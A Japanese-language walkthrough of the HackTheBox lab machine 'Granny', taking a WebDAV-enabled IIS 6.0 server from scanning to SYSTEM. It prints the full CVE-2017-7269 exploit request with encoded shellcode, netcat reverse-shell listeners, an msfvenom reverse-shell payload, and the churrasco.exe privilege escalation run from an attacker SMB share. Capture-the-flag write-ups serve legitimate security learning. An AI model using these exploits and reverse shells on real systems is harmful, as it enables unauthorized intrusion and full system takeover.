HackTheBox Granny Walkthrough
https://app.hackthebox.eu/machines/Granny
おばあちゃんとの ながいたたかいが おわった...!
今回はHackTheBox GrannyのWalkthrough書きます。
PoCがうまく動かないわ、権限昇格後にセッション確保してもすぐ切れるわで大変でした...
目次
ポートスキャン
autoreconでまとめてかけてみる。まずはnmapの結果を確認。
結果を見ると、80番が開いていて、Microsoft IIS 6.0が動いていることが分かる。
OSはWindows。これだけではあんまり旨味がないので、Webサーバ周りを調べることに。
Nmap 7.91 scan initiated Sat Feb 20 17:18:52 2021 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /home/kali/results/10.10.10.15/scans/_full_tcp_nmap.txt -oX /home/kali/results/10.10.10.15/scans/xml/_full_tcp_nmap.xml 10.10.10.15 Nmap scan report for 10.10.10.15 Host is up, received user-set (0.082s latency). Scanned at 2021-02-20 17:18:59 JST for 165s Not shown: 65534 filtered ports Reason: 65534 no-responses PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack Microsoft IIS httpd 6.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST |_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT |_http-server-header: Microsoft-IIS/6.0 |_http-title: Under Construction | http-webdav-scan: | Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK | Server Type: Microsoft-IIS/6.0 | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH | WebDAV type: Unknown |_ Server Date: Sat, 20 Feb 2021 08:21:42 GMT Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Feb 20 17:21:44 2021 -- 1 IP address (1 host up) scanned in 171.49 second
Webサーバの調査
普通にブラウザでアクセスしてみるとこんな感じ。
工事中の画面が見える...
gobusterの結果は以下の通り。_privateの中身はあまりおもしろくなかった。
/Images (Status: 301) [Size: 152] /_private (Status: 301) [Size: 156] /_vti_bin (Status: 301) [Size: 158] /_vti_inf.html (Status: 200) [Size: 1754] /_vti_log (Status: 301) [Size: 158] /_vti_bin/_vti_adm/admin.dll (Status: 200) [Size: 195] /_vti_bin/shtml.dll (Status: 200) [Size: 96] /_vti_bin/_vti_aut/author.dll (Status: 200) [Size: 195] /aspnet_client (Status: 301) [Size: 161] /images (Status: 301) [Size: 152] /postinfo.html (Status: 200) [Size: 2440]
niktoの結果。ASP.NETの受付や、WebDAVもいけるっぽい。
- Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.15 + Target Hostname: 10.10.10.15 + Target Port: 80 + Start Time: 2021-02-20 17:19:21 (GMT9) --------------------------------------------------------------------------- + Server: Microsoft-IIS/6.0 + Retrieved microsoftofficewebserver header: 5.0_Pub + Retrieved x-powered-by header: ASP.NET + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Retrieved x-aspnet-version header: 1.1.4322 + No CGI Directories found (use '-C all' to force check all possible dirs) + OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server. + OSVDB-5646: HTTP method 'DELETE' allows clients to delete files on the web server. + Retrieved dasl header: <DAV:sql> + Retrieved dav header: 1, 2 + Retrieved ms-author-via header: MS-FP/4.0,DAV + Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server. + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server. + Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH + OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server. + OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server. + WebDAV enabled (SEARCH COPY UNLOCK MKCOL PROPPATCH PROPFIND LOCK listed as allowed) + OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll + OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted. + OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found. + OSVDB-3233: /_private/: FrontPage directory found. + OSVDB-3233: /_vti_bin/: FrontPage directory found. + OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information). + OSVDB-3300: /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted). + OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252. + OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST. + /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found. + 8018 requests: 0 error(s) and 32 item(s) reported on remote host + End Time: 2021-02-20 17:32:46 (GMT9) (805 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
WebDAVの調査ができないか探したところ、davtestというツールがあった。
また、そのツールを調べた際、「IIS6には脆弱性があって、.aspを.txtのふりしてアップロードし、
WebDAVでリネームすると発火できるらしい」ことを知った。以下の記事に行き着いた。
ということでdavtestおためし。確かに、asp(x)をPUTで送りつけるとダメで、txtは無事であることが分かる。
┌──(kali㉿kali)-[~] └─$ davtest -url http://10.10.10.15 ******************************************************** Testing DAV connection OPEN SUCCEED: http://10.10.10.15 ******************************************************** NOTE Random string for this session: 1h3pwX ******************************************************** Creating directory MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_1h3pwX ******************************************************** Sending test files PUT cgi FAIL PUT asp FAIL PUT aspx FAIL PUT html SUCCEED: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.html PUT shtml FAIL PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.jsp PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.cfm PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.jhtml PUT pl SUCCEED: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.pl PUT php SUCCEED: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.php PUT txt SUCCEED: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.txt ******************************************************** Checking for test file execution EXEC html SUCCEED: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.html EXEC jsp FAIL EXEC cfm FAIL EXEC jhtml FAIL EXEC pl FAIL EXEC php FAIL EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.txt ******************************************************** /usr/bin/davtest Summary: Created: http://10.10.10.15/DavTestDir_1h3pwX PUT File: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.html PUT File: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.jsp PUT File: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.cfm PUT File: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.jhtml PUT File: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.pl PUT File: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.php PUT File: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.txt Executes: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.html Executes: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.txt
autoreconの結果より、whatwebの結果を参照すると、asp(x)は動作するので、
アップロードしてから拡張子を変える分には大丈夫そう。これはチャンスだ。
WhatWeb report for http://10.10.10.15:80 Status : 200 OK Title : <None> IP : 10.10.10.15 Country : RESERVED, ZZ Summary : X-Powered-By[ASP.NET], HTTPServer[Microsoft-IIS/6.0], UncommonHeaders[microsoftofficewebserver], Microsoft-IIS[6.0][Under Construction], MicrosoftOfficeWebServer[5.0_Pub] Detected Plugins: [ HTTPServer ] HTTP server header string. This plugin also attempts to identify the operating system from the server header. String : Microsoft-IIS/6.0 (from server string) [ Microsoft-IIS ] Microsoft Internet Information Services (IIS) for Windows Server is a flexible, secure and easy-to-manage Web server for hosting anything on the Web. From media streaming to web application hosting, IIS's scalable and open architecture is ready to handle the most demanding tasks. Module : Under Construction Module : Under Construction Version : 6.0 Website : http://www.iis.net/ [ MicrosoftOfficeWebServer ] Microsoft Office Web Server Version : 5.0_Pub Website : http://microsoft.com/ [ UncommonHeaders ] Uncommon HTTP server headers. The blacklist includes all the standard headers and many non standard but common ones. Interesting but fairly common headers should have their own plugins, eg. x-powered-by, server and x-aspnet-version. Info about headers can be found at www.http-stats.com String : microsoftofficewebserver (from headers) [ X-Powered-By ] X-Powered-By HTTP header String : ASP.NET (from x-powered-by string) HTTP Headers: HTTP/1.1 200 OK Content-Length: 1433 Content-Type: text/html Content-Location: http://10.10.10.15/iisstart.htm Last-Modified: Fri, 21 Feb 2003 15:48:30 GMT Accept-Ranges: bytes ETag: "05b3daec0d9c21:360" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Date: Sat, 20 Feb 2021 08:19:24 GMT Connection: close
PoCの実行
IIS6のPoCを調べて、今回はこちらを使ってシェルを狙う。Pythonで書かれている。
ただし、ダウンロードしても拡張子がついていないので、自分でつけてあげる必要あり。
┌──(kali㉿kali)-[~/Downloads] └─$ cd iis6-exploit-2017-CVE-2017-7269-master ┌──(kali㉿kali)-[~/Downloads/iis6-exploit-2017-CVE-2017-7269-master] └─$ ls README.md 'iis6 reverse shell' ┌──(kali㉿kali)-[~/Downloads/iis6-exploit-2017-CVE-2017-7269-master] └─$ mv 'iis6 reverse shell' PoC.py ┌──(kali㉿kali)-[~/Downloads/iis6-exploit-2017-CVE-2017-7269-master] └─$ chmod 755 PoC.py ┌──(kali㉿kali)-[~/Downloads/iis6-exploit-2017-CVE-2017-7269-master] └─$ ls PoC.py README.md
引数は4つ必要なので、事前に確認しておく
ncを使って、ポート1234番で待ち受けて、いざ実行したら、刺さった。
┌──(kali㉿kali)-[~] └─$ nc -vlnp 1234 listening on [any] 1234 ... ┌──(kali㉿kali)-[~/Downloads/iis6-exploit-2017-CVE-2017-7269-master] └─$ python PoC.py 10.10.10.15 80 10.10.14.2 1234 PROPFIND / HTTP/1.1 Host: localhost Content-Length: 1744 If: <http://localhost/aaaaaaa潨硣睡焳椶䝲稹䭷佰畓穏䡨噣浔桅㥓偬啧杣㍤䘰硅楒吱䱘橑牁䈱瀵塐㙤汇㔹呪倴呃睒偡㈲测水㉇扁㝍兡塢䝳剐㙰畄桪㍴乊硫䥶乳䱪坺潱塊㈰㝮䭉前䡣潌畖畵景癨䑍偰稶手敗畐橲穫睢癘扈攱ご汹偊呢倳㕷橷䅄㌴摶䵆噔䝬敃瘲牸坩䌸扲娰夸呈ȂȂዀ栃汄剖䬷汭佘塚祐䥪塏䩒䅐晍Ꮐ栃䠴攱潃湦瑁䍬Ꮐ栃千橁灒㌰塦䉌灋捆关祁穐䩬> (Not <locktoken:write1>) <http://localhost/bbbbbbb祈慵佃潧歯䡅㙆杵䐳㡱坥婢吵噡楒橓兗㡎奈捕䥱䍤摲㑨䝘煹㍫歕浈偏穆㑱潔瑃奖潯獁㑗慨穲㝅䵉坎呈䰸㙺㕲扦湃䡭㕈慷䵚慴䄳䍥割浩㙱乤渹捓此兆估硯牓材䕓穣焹体䑖漶獹桷穖慊㥅㘹氹䔱㑲卥塊䑎穄氵婖扁湲昱奙吳ㅂ塥奁煐〶坷䑗卡Ꮐ栃湏栀湏栀䉇癪Ꮐ栃䉗佴奇刴䭦䭂瑤硯悂栁儵牺瑺䵇䑙块넓栀ㅶ湯ⓣ栁ᑠ栃翾<ffff><ffff>Ꮐ栃Ѯ栃煮瑰ᐴ栃⧧栁鎑栀㤱普䥕げ呫癫牊祡ᐜ栃清栀眲票䵩㙬䑨䵰艆栀䡷㉓ᶪ栂潪䌵ᏸ栃⧧栁VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJINDKSKPKPTKKQTKT0D8TKQ8RTJKKX1OTKIGJSW4R0KOIBJHKCKOKOKOF0V04PF0M0A>
無事Grannyに入れた。shellも奪取。長かった...
でもいつもの一般ユーザで入れたわけじゃなさそう。
┌──(kali㉿kali)-[~] └─$ nc -vlnp 1234 listening on [any] 1234 ... connect to [10.10.14.2] from (UNKNOWN) [10.10.10.15] 1030 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. c:\windows\system32\inetsrv>whoami whoami nt authority\network service
ダメ元で探すものの、ユーザのディレクトリ見つけたがどっちも入れない!残念!
getsystemでも無理!
C:\>dir dir Volume in drive C has no label. Volume Serial Number is 246C-D7FE Directory of C:\ 04/12/2017 05:27 PM <DIR> ADFS 04/12/2017 05:04 PM 0 AUTOEXEC.BAT 04/12/2017 05:04 PM 0 CONFIG.SYS 04/12/2017 10:19 PM <DIR> Documents and Settings 04/12/2017 05:17 PM <DIR> FPSE_search 04/12/2017 05:17 PM <DIR> Inetpub 12/24/2017 08:21 PM <DIR> Program Files 12/24/2017 08:30 PM <DIR> WINDOWS 04/12/2017 05:05 PM <DIR> wmpub 2 File(s) 0 bytes 7 Dir(s) 18,094,600,192 bytes free C:\Documents and Settings>dir dir Volume in drive C has no label. Volume Serial Number is 246C-D7FE Directory of C:\Documents and Settings 04/12/2017 10:19 PM <DIR> . 04/12/2017 10:19 PM <DIR> .. 04/12/2017 09:48 PM <DIR> Administrator 04/12/2017 05:03 PM <DIR> All Users 04/12/2017 10:19 PM <DIR> Lakis 0 File(s) 0 bytes 5 Dir(s) 18,094,596,096 bytes free C:\Documents and Settings>cd Lakis cd Lakis Access is denied. C:\Documents and Settings>cd Administrator cd Administrator Access is denied. C:\Documents and Settings>getsystem getsystem 'getsystem' is not recognized as an internal or external command, operable program or batch file.
権限昇格
Optimumでお世話になった、Windows-Exploit-Suggester を発動。
とりあえずsysteminfoとると、Windows Server 2003だったことが判明。
C:\Documents and Settings>systeminfo systeminfo Host Name: GRANNY OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition OS Version: 5.2.3790 Service Pack 2 Build 3790 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Uniprocessor Free Registered Owner: HTB Registered Organization: HTB Product ID: 69712-296-0024942-44782 Original Install Date: 4/12/2017, 5:07:40 PM System Up Time: 0 Days, 0 Hours, 11 Minutes, 9 Seconds System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz BIOS Version: INTEL - 6040000 Windows Directory: C:\WINDOWS System Directory: C:\WINDOWS\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk Total Physical Memory: 1,023 MB Available Physical Memory: 799 MB Page File: Max Size: 2,470 MB Page File: Available: 2,334 MB Page File: In Use: 136 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): 1 Hotfix(s) Installed. [01]: Q147222 Network Card(s): N/A
ということで、おすすめされてみた。
┌──(kali㉿kali)-[~/tools/Windows-Exploit-Suggester-master] └─$ python windows-exploit-suggester.py --update [*] initiating winsploit version 3.3... [+] writing to file 2021-04-29-mssb.xls [*] done ┌──(kali㉿kali)-[~/tools/Windows-Exploit-Suggester-master] └─$ python windows-exploit-suggester.py --database 2021-04-29-mssb.xls --systeminfo granny_systeminfo.txt [*] initiating winsploit version 3.3... [*] database file detected as xls or xlsx based on extension [*] attempting to read from the systeminfo input file [+] systeminfo input file read successfully (ascii) [*] querying database file for potential vulnerabilities [*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits [*] there are now 356 remaining vulns [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+] windows version identified as 'Windows 2003 SP2 32-bit' [*] [M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important [*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC [*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF [*] [E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical [*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC [*] https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC [*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC [*] [E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important [*] http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC [*] [E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical [*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC [*] [M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical [*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC [*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC [*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC [*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF [*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF [*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF [*] [M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important [*] http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC [*] http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation [*] [M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical [*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF [*] [E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important [*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC [*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC [*] [E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical [E] MS14-029: Security Update for Internet Explorer (2962482) - Critical [*] http://www.exploit-db.com/exploits/34458/ [*] [E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important [*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC [*] [M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical [M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important [E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important [E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important [M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical [M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical [M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical [M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important [M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical [M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical [M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical [M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical [M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical [E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical [*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC [*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC [*] [M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important [E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important [M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important [M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical [M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important [M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical [M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical [M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical [M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important [M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important [M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important [M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical [M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical [M] MS08-078: Security Update for Internet Explorer (960714) - Critical [*] done
ということで上から試したがどれも結局いまいちだった。
仕方ないので自分で調べると、MS09-012を使った、churrasco.exeというツールが使えそうなことがわかる。
Windows Server 2003の脆弱性(MS09–012)を悪用し、権限昇格をするツールとのこと。
すぐ使えるバイナリ版はこちら
バイナリ版をぶん投げて実行させればいいのか。
Optimumのように、Powershell+wgetで投げようとしたがPowershellが使えない。
Sambaサーバ経由でアクセスさせることにした(ここでHTBAcademyの内容が少し役立った)
churrasco.exe を置いたところにSMBサーバを立てる。impacket-smbserverが使える。
┌──(kali㉿kali)-[/var/www/html] └─$ sudo impacket-smbserver smbDir $(pwd) Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed
GrannyからSMBに接続し、churrascoを実行させる。
nt authoriry\systemになったため権限昇格できていることがわかる
C:\WINDOWS\system32\inetsrv>\\10.10.14.2\smbDir\churrasco.exe whoami \\10.10.14.2\smbDir\churrasco.exe whoami nt authority\system
このままではうまくいかないので、さらにncで4444番に通信を転送させるペイロードを作成し、
SMBを立てたディレクトリに置いて実行権限をつける
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe > shell.exe ┌──(kali㉿kali)-[~] └─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe > shell.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes ┌──(kali㉿kali)-[~] └─$ sudo mv shell.exe /var/www/html [sudo] kali のパスワード: ┌──(kali㉿kali)-[/var/www/html] └─$ chmod +x shell.exe
Granny側でSMBに接続し、ペイロードを実行させる
C:\WINDOWS\system32\inetsrv>\\10.10.14.2\smbDir\churrasco.exe \\10.10.14.2\\smbDir\shell.exe \\10.10.14.2\smbDir\churrasco.exe \\10.10.14.2\\smbDir\shell.exe
おそらく、この辺にフラグがあるはず(もはや今までの経験じゃないか...)
type C:\Documents and Settings\Lakis\Desktop\user.txt type C:\Documents and Setting\Administrator\Desktop\root.txt
ncで待ち受けるが、ぶちぶち通信が切れてしまうので、がんばって早打ちしてフラグゲット。長かった
┌──(kali㉿kali)-[~] └─$ nc -vlnp 4444 listening on [any] 4444 ... connect to [10.10.14.2] from (UNKNOWN) [10.10.10.15] 1051 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\TEMP>type C:\Documents and Settings\Lakis\Desktop\user.txt type C:\Documents and Settings\Lakis\Desktop\user.txt The system cannot find the file specified. Error occurred while processing: C:\Documents. The system cannot find the file specified. Error occurred while processing: and. The system cannot find the path specified. # ちょっと略 C:\Documents and Settings\Lakis\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 246C-D7FE Directory of C:\Documents and Settings\Lakis\Desktop 04/12/2017 10:19 PM <DIR> . 04/12/2017 10:19 PM <DIR> .. 04/12/2017 10:20 PM 32 user.txt 1 File(s) 32 bytes 2 Dir(s) 18,090,950,656 bytes free C:\Documents and Settings\Lakis\Desktop>type user.txt type user.txt
ここでセッション切れたので、繋ぎ直してrootフラグを取りに行く
┌──(kali㉿kali)-[~] └─$ nc -vlnp 4444 listening on [any] 4444 ... connect to [10.10.14.2] from (UNKNOWN) [10.10.10.15] 1052 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. # ちょっと略 C:\Documents and Settings\Administrator>dir dir Volume in drive C has no label. Volume Serial Number is 246C-D7FE Directory of C:\Documents and Settings\Administrator 04/12/2017 09:48 PM <DIR> . 04/12/2017 09:48 PM <DIR> .. 04/12/2017 05:28 PM <DIR> Desktop 04/12/2017 05:12 PM <DIR> Favorites 04/12/2017 05:12 PM <DIR> My Documents 04/12/2017 04:42 PM <DIR> Start Menu 04/12/2017 04:44 PM 0 Sti_Trace.log 1 File(s) 0 bytes 6 Dir(s) 18,090,934,272 bytes free C:\Documents and Settings\Administrator>cd Desktop cd Desktop C:\Documents and Settings\Administrator\Desktop>type root.txt type root.txt
権限昇格のところは結構心が折れた。Metasploit発動した方が楽だったかも。
次はおじいちゃん(Grandpa)いってみるかな...
